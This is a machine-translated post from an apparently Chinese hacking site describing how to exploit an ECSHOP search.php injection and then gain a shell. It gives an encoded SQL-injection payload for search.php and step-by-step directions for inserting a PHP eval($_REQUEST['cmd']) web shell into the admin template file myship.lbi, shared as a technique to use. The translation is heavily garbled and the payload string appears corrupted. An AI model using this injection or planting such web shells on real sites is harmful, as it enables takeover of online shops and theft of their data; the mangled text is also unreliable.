ECSHOP search injection vulnerability using exp and a background to take the shell-vulnerability warning-the black bar safety net

2010-08-02T00:00:00
ID MYHACK58:62201027762
Type myhack58
Reporter 佚名
Modified 2010-08-02T00:00:00

Description

这个 是 search.php exp variants search.php? encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxmju6ijenksbhbmqgmt0yiedst1vqiejzigdvb2rzx2lkihvuaw9uigfsbcbzzwxly3qgy29uy2f0khvzzxjfbmftzswwednhlhbhc3n3b3jklccixccpihvuaw9uihnlbgvjdcaxiyinkswxigzyb20gzwnzx2fkbwlux3vzzxijijtzoje6ijeio319

Take SHELL landing in the background/admin/ enter the user password for the module management-library management-select myship. lbi insert<? php eval($_REQUEST['cmd'])?& gt;

Connectionhttp://www.. net/myship.php*word

!

I injected into a background, and then follow the step to try it, if successful. The following steps of:

!

!

Point determine after accesshttp://www.. net/myship.php*, see this page what's changed, and then I used the lake2 of dual-use sentence sure enough the connection is successful. As shown in Figure:

!

This method principle is said to ECSHOP the smarty template mechanism is to allow the direct execution of php code, resulting in exploits generated. My smarty's nothing to understand, but will try.

This method is really good, once again gotten the cattle of the technology. Just found online nothing to improve this method, so I saw it and share.